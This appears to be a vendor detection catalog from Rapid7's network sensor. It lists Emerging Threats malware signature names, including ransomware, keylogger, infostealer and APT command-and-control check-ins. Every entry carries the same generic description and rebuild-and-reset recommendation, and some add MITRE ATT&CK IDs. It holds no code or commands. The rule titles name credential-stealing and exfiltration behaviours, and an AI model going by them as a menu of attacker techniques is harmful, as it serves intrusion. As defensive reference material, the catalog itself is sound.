This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent STORMDDOS

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent YTDDOS

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound JasperLoader Using Array Push Obfuscation

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound MonetizeUs/LNKR Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Executing Base64 Decoded VBE from Temp 2018-11-29

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Saving Base64 Decoded Payload to Temp M1 2018-11-29

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Saving Base64 Decoded Payload to Temp M2 2018-11-29

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inception APT malware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IndigoZebra APT BoxCaon DropBox Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IndigoZebra APT xCaon/Textpadx Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE indux.php check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE InfoBot Sending LAN Details

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE InfoBot Sending Machine Details

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Bancos ProxyChanger Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Banprox Proxy.pac Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Jackpos Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Jackpos Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Mysayad Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Mysayad Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Instagram Like Bot (like4u) CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Instagram Like Bot (like4u) CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Internet Protection FakeAV checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IOS.Oneclickfraud HTTP Host

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IP Grabber CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IrcBot Downloading .old

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IrcBot Fantasy Name Gen

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ironhalo CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Iron/Maktub Locker Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ISMAgent CnC Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ISRStealer Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IsSpace/Zacom Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ixeshe/Mecklow Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ixeshe/Mecklow Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IXWARE Stealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JackPOS XOR Encoded HTTP Client Body (key AA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jadtree Downloader rar

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jaff Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Jaff Ransomware Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE JAR/Qealler Stealer HTTP Headers Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasmin Ransomware C2 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE JasperLoader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java Archive sent when remote host claims to send an image

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java Download non Jar file

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java/QRat Retrieving PE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JavaScriptBackdoor HTTP GET CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Javascript Click and Removal of Download Element

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Javascript Displays malicious download page

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jembot PHP Webshell (file upload)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jembot PHP Webshell (system command)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE jFect HTTP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Joanap CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jorik FakeAV GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Agent.NZH CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/HTA Downloader Behavior M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS.InfectedMikrotik Injects Domain Observed in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting EXE payload 2015-10-07

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting EXE payload 2015-11-02

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting PDF payload 2015-10-07

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting PDF payload 2015-11-02

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2015-12-01

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-01-28

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-06

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-03-31

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Ostap CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Ostap Maldoc Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx CnC Activity - Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx CnC Activity - Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/RAA Ransomware check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE JS/Skimmer Inbound (Likely MageCart) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS Sniffer Framework Sending to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Spy.Agent.AW Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/TrojanDownloader.Agent.TXV CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Unk Downloader 0 Byte POST CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JunkMiner Downloader Communicating with CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer Reporting System Information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer Reporting System Information M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kaseya VSA Exploit Activity M1 (SET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kaseya VSA Exploit Activity M2 (SET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy/Kryptor/Cycbot Trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy/Kryptor/Cycbot Trojan Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kelihos/Hlux GET jucheck.exe from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kelihos.K Executable Download DGA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger HTTP Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger Uploading Screenshots

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (go https)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (kill)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (sleep)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KimJongRAT cnc exe pull

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky CSPY Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor Secondary Payload Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Malware Suite Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Malware Suite Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Operation Blue Estimate CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Activity Sending Windows Information (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Maldoc Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky WildCommand CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KINS/ZeusVM Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041
